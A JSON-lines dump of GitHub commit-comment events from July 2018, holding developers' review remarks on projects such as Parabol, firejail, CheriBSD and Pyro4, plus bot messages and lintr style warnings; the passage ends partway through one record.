{"id":"8045431108","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":29907938,"position":null,"line":null,"path":null,"commit_id":"0635781052e8f0dabc28571c4550c9b921ee8d23","created_at":"2018-07-31T17:04:47Z","updated_at":"2018-07-31T17:04:47Z","author_association":"MEMBER","body":"@mattkrick how does this look? I think this takes care of all the places where the URL “slug” is used. It would make updating easier, I think. I didn’t change the values with this commit because doing so requires updates to auth0 applications for allowed callback URLs.\r\n\r\nAlso, would we want to rename forms and components? eg. `SignInPage.js` => `LogInPage.js` ?"}},"created_at":"2018-07-31T17:04:47Z"}
{"id":"8045432138","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29907941,"position":null,"line":null,"path":null,"commit_id":"90bd34c9c475af85d5d06238a5d062cc30ad4b3d","created_at":"2018-07-31T17:05:00Z","updated_at":"2018-07-31T17:05:00Z","author_association":"NONE","body":"with latest RT results, imho, even if it passes LTC it needs to be tested at LTC again."}},"created_at":"2018-07-31T17:05:00Z"}
{"id":"8045432464","type":"CommitCommentEvent","actor":{"login":"mikz"},"repo":{"name":"3scale/3scale_toolbox"},"payload":{"comment":{"id":29907945,"position":3,"line":2,"path":".rspec","commit_id":"c48b85359d0ba3710784a4d00ff6efde23cefdd9","created_at":"2018-07-31T17:05:04Z","updated_at":"2018-07-31T17:05:04Z","author_association":"MEMBER","body":"This is usually the last file people look at. IMO it makes more sense to require in the spec_helper."}},"created_at":"2018-07-31T17:05:04Z"}
{"id":"8045434136","type":"CommitCommentEvent","actor":{"login":"bsdjhb"},"repo":{"name":"CTSRD-CHERI/cheribsd"},"payload":{"comment":{"id":29907949,"position":18,"line":324,"path":"sys/kern/kern_sig.c","commit_id":"3cb1d9235d12a962d8888e8bae010485fd247d9a","created_at":"2018-07-31T17:05:24Z","updated_at":"2018-07-31T17:05:24Z","author_association":"NONE","body":"Ah, ok.  An earlier change I had to strip tags explicitly for PT_GETCAPREGS can probably be reverted then.  I do think we should document this explicitly, perhaps in the CheriABI ptrace wrapper?"}},"created_at":"2018-07-31T17:05:24Z"}
{"id":"8045434894","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29907950,"position":null,"line":null,"path":null,"commit_id":"fc7cd03d3cdec3b1700a8ea8e0d92447321a9abb","created_at":"2018-07-31T17:05:33Z","updated_at":"2018-07-31T17:05:33Z","author_association":"MEMBER","body":"you're on your way to do things correctly, but there's still a ton of 'room for improvement'"}},"created_at":"2018-07-31T17:05:33Z"}
{"id":"8045439671","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29907997,"position":122,"line":122,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T17:06:29Z","updated_at":"2018-07-31T17:06:29Z","author_association":"NONE","body":"ретерн не нужен, уже писал выше"}},"created_at":"2018-07-31T17:06:29Z"}
{"id":"8045444639","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29908018,"position":null,"line":null,"path":null,"commit_id":"69c0550159f6969ff7d0077bf35818ca39e19b0d","created_at":"2018-07-31T17:07:29Z","updated_at":"2018-07-31T17:07:29Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-1](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T17:07:29Z"}
{"id":"8045445169","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29908022,"position":null,"line":null,"path":null,"commit_id":"5007c613e88fef690b50f16fc446e6fac5c0a7d5","created_at":"2018-07-31T17:07:35Z","updated_at":"2018-07-31T17:07:35Z","author_association":"MEMBER","body":"🙃"}},"created_at":"2018-07-31T17:07:35Z"}
{"id":"8045447040","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29908025,"position":null,"line":null,"path":null,"commit_id":"432dc83dd1d085a5d2581610693924c24713f979","created_at":"2018-07-31T17:07:55Z","updated_at":"2018-07-31T17:07:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [049 - Criar Pessoa Service](https://trello.com/c/ZJyNkydu/57-049-criar-pessoa-service)"}},"created_at":"2018-07-31T17:07:55Z"}
{"id":"8045451114","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29908032,"position":null,"line":null,"path":null,"commit_id":"57ba14fb67ded9580651215b7ffeab4cd2321657","created_at":"2018-07-31T17:08:43Z","updated_at":"2018-07-31T17:08:43Z","author_association":"MEMBER","body":"this commit is by me, sorry I forgot to config my user before comitment"}},"created_at":"2018-07-31T17:08:43Z"}
{"id":"8045453149","type":"CommitCommentEvent","actor":{"login":"tiagocostapt"},"repo":{"name":"MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions"},"payload":{"comment":{"id":29908042,"position":null,"line":null,"path":null,"commit_id":"a813220c9c2388877dc1cff8c7faf4c26375bc58","created_at":"2018-07-31T17:09:09Z","updated_at":"2018-07-31T17:09:09Z","author_association":"CONTRIBUTOR","body":"This change created an error. We still need to following entry in the variables list: \r\n\"networkSecurityGroupName\": \"20533D0301-app-nsg\" , or else this will give an error when deploying the ARM Template.\r\n\r\n\r\nShould we add this line again? I just fixed this on my end and it worked.\r\n\r\n"}},"created_at":"2018-07-31T17:09:09Z"}
{"id":"8045453459","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29908043,"position":43,"line":43,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T17:09:12Z","updated_at":"2018-07-31T17:09:12Z","author_association":"NONE","body":"Меня пугает этот метод. Он вызывает другой метод и больше ничего не делает... при этом его название отличается от того метода, что он вызывает. \r\n![hqdefault](https://user-images.githubusercontent.com/28672259/43475158-84aa27c8-94fd-11e8-99c8-3188f8e402ff.jpg)\r\n"}},"created_at":"2018-07-31T17:09:12Z"}
{"id":"8045453580","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29908045,"position":null,"line":null,"path":null,"commit_id":"72bb3e06fd62f23f25d06339fc9fa2a3260bc5d6","created_at":"2018-07-31T17:09:13Z","updated_at":"2018-07-31T17:09:13Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1148](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1148).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1148-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T17:09:13Z"}
{"id":"8045454643","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"intel/compute-runtime"},"payload":{"comment":{"id":29908050,"position":6,"line":41,"path":"runtime/helpers/kmd_notify_properties.cpp","commit_id":"d53e1c3979f6d822f55645bfcd753be1658f53ca","created_at":"2018-07-31T17:09:27Z","updated_at":"2018-07-31T17:09:27Z","author_association":"NONE","body":"Why there are different timeouts for different modes at the first place? Do you have data to prove this is really needed?\r\n\r\nIf I understand correctly, this is a timeout for the optimistic spin waiting for the submitted task, right? Why you are trying to introduce your own optimistic spin when Linux i915 driver have its own already? Why it is not enough?\r\n"}},"created_at":"2018-07-31T17:09:27Z"}
{"id":"8045457197","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29908056,"position":43,"line":43,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T17:09:57Z","updated_at":"2018-07-31T17:09:57Z","author_association":"OWNER","body":"Да не успел дописать, блен Поелнок"}},"created_at":"2018-07-31T17:09:57Z"}
{"id":"8045458156","type":"CommitCommentEvent","actor":{"login":"filipenos"},"repo":{"name":"filipenos/dotfiles"},"payload":{"comment":{"id":29908062,"position":26,"line":121,"path":"vimrc","commit_id":"821e64da94567ce1e084c75e3741fbe4fcf347ed","created_at":"2018-07-31T17:10:10Z","updated_at":"2018-07-31T17:10:10Z","author_association":"OWNER","body":"Eu havia pensado nisso, fazer especifico para os arquivos go, mas depois fiquei pensando em algo mais genérico, onde seja possível ir adicionando as extensões que queira se fazer o build, tipo java ou c."}},"created_at":"2018-07-31T17:10:10Z"}
{"id":"8045463497","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"intel/compute-runtime"},"payload":{"comment":{"id":29908073,"position":20,"line":185,"path":"runtime/context/context.cpp","commit_id":"d53e1c3979f6d822f55645bfcd753be1658f53ca","created_at":"2018-07-31T17:11:14Z","updated_at":"2018-07-31T17:11:14Z","author_association":"NONE","body":"This will work only when user _is_ using media sharing extension. But this will not work if for any reason user don't use the extension, but runs opencl in parallel to media which is quite the use case. Thus, issue with high CPU% and hence power consumption still exists."}},"created_at":"2018-07-31T17:11:14Z"}
{"id":"8045463705","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29908074,"position":null,"line":null,"path":null,"commit_id":"33a1d74225d636dc0ce02adfd5f4fdb9bc2aa642","created_at":"2018-07-31T17:11:16Z","updated_at":"2018-07-31T17:11:16Z","author_association":"MEMBER","body":"I don't think we need to include this here....\r\nI think we only need to include frameworks or 'big' stuff\r\nI do think we need to add 'webpack' though"}},"created_at":"2018-07-31T17:11:16Z"}
{"id":"8045463873","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29908075,"position":null,"line":null,"path":null,"commit_id":"0b41774a0010a8e769b29d04f2167d1537a7bc89","created_at":"2018-07-31T17:11:18Z","updated_at":"2018-07-31T17:11:18Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-470](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-470).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-470-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T17:11:18Z"}
{"id":"8045465300","type":"CommitCommentEvent","actor":{"login":"njohnwalker"},"repo":{"name":"kframework/kore"},"payload":{"comment":{"id":29908086,"position":55,"line":24,"path":"src/main/haskell/language-kore/app/parser/Main.hs","commit_id":"0523874ed60f61a82dc04039ba7c9eec5ceece53","created_at":"2018-07-31T17:11:34Z","updated_at":"2018-07-31T17:11:34Z","author_association":"COLLABORATOR","body":"#167 My mistake!  I will revert back to `print` "}},"created_at":"2018-07-31T17:11:34Z"}
{"id":"8045465392","type":"CommitCommentEvent","actor":{"login":"tpimh"},"repo":{"name":"tpimh/nenuzhnix"},"payload":{"comment":{"id":29908087,"position":null,"line":null,"path":null,"commit_id":"44dd49b53f36427c7fe82f4c8858b320d3584fe6","created_at":"2018-07-31T17:11:35Z","updated_at":"2018-07-31T17:11:35Z","author_association":"OWNER","body":"Closes #23"}},"created_at":"2018-07-31T17:11:35Z"}
{"id":"8045466559","type":"CommitCommentEvent","actor":{"login":"rtrout8282"},"repo":{"name":"IBM/xgboost-financial-predictions"},"payload":{"comment":{"id":29908090,"position":18,"line":110,"path":"README.md","commit_id":"2577a3caf21d0ff7b2390504bbaf1e87aef57d68","created_at":"2018-07-31T17:11:49Z","updated_at":"2018-07-31T17:11:49Z","author_association":"NONE","body":"2777a3c"}},"created_at":"2018-07-31T17:11:49Z"}
{"id":"8045472341","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29908109,"position":null,"line":null,"path":null,"commit_id":"27bf092386581a1f04e417df12c272bc935bc30c","created_at":"2018-07-31T17:12:59Z","updated_at":"2018-07-31T17:12:59Z","author_association":"MEMBER","body":"this is kind of a 'hack', there must be a better way to do this...."}},"created_at":"2018-07-31T17:12:59Z"}
{"id":"8045472796","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29908110,"position":null,"line":null,"path":null,"commit_id":"dbd557f27b2cec7549e53628db3e8b60257d4050","created_at":"2018-07-31T17:13:04Z","updated_at":"2018-07-31T17:13:04Z","author_association":"CONTRIBUTOR","body":".gitignore was working correctly (there was a manually added file \"rad_analysis\" which has since been removed - see www.github.com/sbujlab/rad_analysis for the current versions of that), so these two commits are unnecessary (but not bad).\r\n\r\nI tried to git revert these two with my local commit hash numbers, but it didn't appear to actually remove them from the push."}},"created_at":"2018-07-31T17:13:04Z"}
{"id":"8045473285","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29908112,"position":null,"line":null,"path":null,"commit_id":"47cecd764f7cfa7fa30e1555f71f40cd540f6c32","created_at":"2018-07-31T17:13:10Z","updated_at":"2018-07-31T17:13:10Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-4](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T17:13:10Z"}
{"id":"8045475053","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29908118,"position":6,"line":22,"path":"package.json","commit_id":"64f1af2efcefc0f763101d5068d46c6c0051bd72","created_at":"2018-07-31T17:13:32Z","updated_at":"2018-07-31T17:13:32Z","author_association":"MEMBER","body":"replaced with mini-css-extract-plugin"}},"created_at":"2018-07-31T17:13:32Z"}
{"id":"8045479045","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"BitzenyCoreDevelopers/bitzeny"},"payload":{"comment":{"id":29908124,"position":9,"line":70,"path":".travis.yml","commit_id":"59ee773d4d975c5894b5554b5677426822b3832d","created_at":"2018-07-31T17:14:17Z","updated_at":"2018-07-31T17:14:17Z","author_association":"NONE","body":"why it disabled?"}},"created_at":"2018-07-31T17:14:17Z"}
{"id":"8045480161","type":"CommitCommentEvent","actor":{"login":"KarimFathy"},"repo":{"name":"KarimFathy/LCD_MODULE"},"payload":{"comment":{"id":29908127,"position":null,"line":null,"path":null,"commit_id":"11706b277010995e766bb7f3d3d18bab36c66798","created_at":"2018-07-31T17:14:31Z","updated_at":"2018-07-31T17:14:31Z","author_association":"OWNER","body":"start git"}},"created_at":"2018-07-31T17:14:31Z"}
{"id":"8045480779","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29908132,"position":null,"line":null,"path":null,"commit_id":"e5ac6e1fb3592df6f716ebd9297dfd4f8b32f796","created_at":"2018-07-31T17:14:38Z","updated_at":"2018-07-31T17:14:38Z","author_association":"CONTRIBUTOR","body":"We are working on incorporating envelope tracking and fitting into remoll - sbujlab/remoll/feature-envelope branch merge is pending."}},"created_at":"2018-07-31T17:14:38Z"}
{"id":"8045483286","type":"CommitCommentEvent","actor":{"login":"brooksdavis"},"repo":{"name":"CTSRD-CHERI/cheribsd"},"payload":{"comment":{"id":29908143,"position":18,"line":324,"path":"sys/kern/kern_sig.c","commit_id":"3cb1d9235d12a962d8888e8bae010485fd247d9a","created_at":"2018-07-31T17:15:09Z","updated_at":"2018-07-31T17:15:09Z","author_association":"MEMBER","body":"It wouldn't hurt to document in a comment.\r\n\r\nOne of the design principles in the current kernel code is that we don't preserve tags on copyin/out unless we absolutely have to reduce the risk of leakage.  @rwatson and I have discussed even more aggressive options like making kernel capabilities local and removing store-local from pointers obtained from syscall args to prevent kernel cap leakage even with copyout_cap()."}},"created_at":"2018-07-31T17:15:09Z"}
{"id":"8045483815","type":"CommitCommentEvent","actor":{"login":"DimitriLeandro"},"repo":{"name":"DimitriLeandro/ProjetoExtensaoMaua"},"payload":{"comment":{"id":29908144,"position":1,"line":1,"path":".gitattributes","commit_id":"e32723c51cdb84f3362c0154d2b9a1dd71236c96","created_at":"2018-07-31T17:15:14Z","updated_at":"2018-07-31T17:15:14Z","author_association":"OWNER","body":"Nesse commit também foi adicionado suporte para arquivos maiores que 100Mb com o Git LFS. Por isso todos os arquivos sql aparecem como alterados nesse commit, mas na vdd não foram.\r\nhttps://git-lfs.github.com/"}},"created_at":"2018-07-31T17:15:14Z"}
{"id":"8045487323","type":"CommitCommentEvent","actor":{"login":"Vincent43"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908152,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:15:52Z","updated_at":"2018-07-31T17:15:52Z","author_association":"COLLABORATOR","body":"Isn't this printing too much lines? It's looks quite overwhelming:\r\n\r\n```\r\n***\r\n*** Error: Music directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Pictures\"\r\n***\r\n*** Error: Pictures directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Videos\"\r\n***\r\n*** Error: Videos directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\nWarning: /sbin directory link was not blacklisted\r\nWarning: /usr/sbin directory link was not blacklisted\r\ndirectory resolved as \"/Documents\"\r\n***\r\n*** Error: Documents directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Music\"\r\n***\r\n*** Error: Music directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Pictures\"\r\n***\r\n*** Error: Pictures directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Videos\"\r\n***\r\n*** Error: Videos directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\n```"}},"created_at":"2018-07-31T17:15:52Z"}
{"id":"8045491904","type":"CommitCommentEvent","actor":{"login":"DianaSerra"},"repo":{"name":"DianaSerra/series-data-prototype"},"payload":{"comment":{"id":29908160,"position":43,"line":43,"path":"src/series/components/BatchImport.js","commit_id":"33b28c86be7bf7a8378761ed8e2d285bd85b22d2","created_at":"2018-07-31T17:16:45Z","updated_at":"2018-07-31T17:16:45Z","author_association":"OWNER","body":"Hey Armin, \r\nI've tried using this function and I'm now getting this error: \r\n\r\n``\r\nTypeError: batches.map is not a function\r\n``\r\n\r\nI think the error lies somewhere in the `` setState `` call; I tried printing what ``R.over(innerArrayLens,  R.append(file), batches }) ``  returns and I got something like this\r\n\r\n``{\"0\":{\"files\":[]},\"[object Object]\":{\"files\":[{}]}}``\r\n\r\nI tried setting ``const { batches } = this.state.batches;`` but the over function returns this:\r\n\r\n``{\"[object Object]\":{\"files\":[{}]}}``\r\n\r\nSo maybe this is turning the batches array into an object somewhere, which is why it can't map? I'm unsure where the issue is though, i've tried modifying the lens as well but no luck. Is there something I'm missing?\r\n\r\n"}},"created_at":"2018-07-31T17:16:45Z"}
{"id":"8045494263","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":29908166,"position":null,"line":null,"path":null,"commit_id":"0635781052e8f0dabc28571c4550c9b921ee8d23","created_at":"2018-07-31T17:17:14Z","updated_at":"2018-07-31T17:17:14Z","author_association":"MEMBER","body":"looks good! yeah let's change the component names.\r\nalso, let's just add the new one to the auth0 callback URLs, no need to replace.\r\nthat way, if folks try to log in using the old application, they can still do it.\r\nwe can remove the old URLs in a week or 2"}},"created_at":"2018-07-31T17:17:14Z"}
{"id":"8045496895","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29908179,"position":116,"line":144,"path":"webpack.config.js","commit_id":"1eb21f0c6fac843db0328fd98dda6a80e30e5153","created_at":"2018-07-31T17:17:44Z","updated_at":"2018-07-31T17:17:44Z","author_association":"MEMBER","body":"this is actually opposite to what I want, fixed in commit 8d0e315 (https://github.com/ProjectFK/Blog-Frontend/commit/8d0e315a364489da91e31c567e983c6fc5f822fa)"}},"created_at":"2018-07-31T17:17:44Z"}
{"id":"8045499216","type":"CommitCommentEvent","actor":{"login":"alik1997"},"repo":{"name":"alik1997/testgithub"},"payload":{"comment":{"id":29908181,"position":null,"line":null,"path":null,"commit_id":"0e3527a5803c13111d5eb5c3aed5814af025f76c","created_at":"2018-07-31T17:18:12Z","updated_at":"2018-07-31T17:18:12Z","author_association":"OWNER","body":"machudao"}},"created_at":"2018-07-31T17:18:12Z"}
{"id":"8045499719","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29908182,"position":28,"line":2079,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T17:18:17Z","updated_at":"2018-07-31T17:18:17Z","author_association":"NONE","body":"Are you really looking to import scripts from arbitrary locations? This will likely be problematic if they depend on other modules that they want to import from their location"}},"created_at":"2018-07-31T17:18:17Z"}
{"id":"8045501256","type":"CommitCommentEvent","actor":{"login":"AliNajafi98"},"repo":{"name":"mojpav/JS_Project"},"payload":{"comment":{"id":29908189,"position":null,"line":null,"path":null,"commit_id":"662a149615c425a9de2019ed5abee03c2c31b5ae","created_at":"2018-07-31T17:18:35Z","updated_at":"2018-07-31T17:18:35Z","author_association":"COLLABORATOR","body":"I also tried to pull a new request , but i wasn't any thing to pull!!"}},"created_at":"2018-07-31T17:18:35Z"}
{"id":"8045507318","type":"CommitCommentEvent","actor":{"login":"Vincent43"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908201,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:19:46Z","updated_at":"2018-07-31T17:19:46Z","author_association":"COLLABORATOR","body":"Also 'xdg dir not found' shouldn't be described as  error."}},"created_at":"2018-07-31T17:19:46Z"}
{"id":"8045533014","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908288,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:24:35Z","updated_at":"2018-07-31T17:24:35Z","author_association":"COLLABORATOR","body":"Hmm...which command-line arguments are you passing to `firejail`? If I do e.g. `firejail --blacklist='${DOWNLOADS}'`, I get:\r\n```\r\nReading profile /usr/local/etc/firejail/default.profile\r\nReading profile /usr/local/etc/firejail/disable-common.inc\r\nReading profile /usr/local/etc/firejail/disable-passwdmgr.inc\r\nReading profile /usr/local/etc/firejail/disable-programs.inc\r\n\r\n** Note: you can use --noprofile to disable default.profile **\r\n\r\nParent pid 3300, child pid 3301\r\ndirectory resolved as \"Downloads\"\r\nChild process initialized in 115.46 ms\r\n```"}},"created_at":"2018-07-31T17:24:35Z"}
{"id":"8045533410","type":"CommitCommentEvent","actor":{"login":"irmen"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29908290,"position":45,"line":2096,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T17:24:40Z","updated_at":"2018-07-31T17:24:40Z","author_association":"NONE","body":"Good idea."}},"created_at":"2018-07-31T17:24:40Z"}
{"id":"8045533881","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"End-to-end-provenance/RDataTracker"},"payload":{"comment":{"id":29908293,"position":null,"line":null,"path":null,"commit_id":"eeaa5efdb1b350be2fc7108012b6a5303d7574fc","created_at":"2018-07-31T17:24:45Z","updated_at":"2018-07-31T17:24:45Z","author_association":"NONE","body":"[R/Annotation.R:52:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L52) *style:* **Lines should not be more than 90 characters.**\n```r\n​#' @param graphic.fext (optional) the file extension for a graphics file, defaults to jpeg.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:56:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n^~~~~~~~~~~~\n```\n[R/Annotation.R:56:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n                         ^~~~~~~~~~~~\n```\n[R/Annotation.R:56:45:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n                                            ^~~~~~~~~\n```\n[R/Annotation.R:57:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                         ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:57:47:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                                              ^~~~~~~~\n```\n[R/Annotation.R:57:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                                                             ^~~~~~~~~\n```\n[R/Annotation.R:58:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L58) *style:* **Variable or function name should be snake_case.**\n```r\n​                         graphic.fext=\"jpeg\") {\n                         ^~~~~~~~~~~~\n```\n[R/Annotation.R:75:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L75) *style:* **Variable or function name should be snake_case.**\n```r\n​  full.call <- tryCatch (match.call(sys.function(-1), call=call),\n  ^~~~~~~~~\n```\n[R/Annotation.R:75:25:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L75) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  full.call <- tryCatch (match.call(sys.function(-1), call=call),\n                        ^\n```\n[R/Annotation.R:79:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L79) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.create.start.for.cur.cmd (call)\n                                ^\n```\n[R/Annotation.R:102:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L102) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:102:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L102) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n                             ^\n```\n[R/Annotation.R:102:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L102) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n                                         ^~~~~~~~\n```\n[R/Annotation.R:107:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L107) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.stmt <- NULL\n  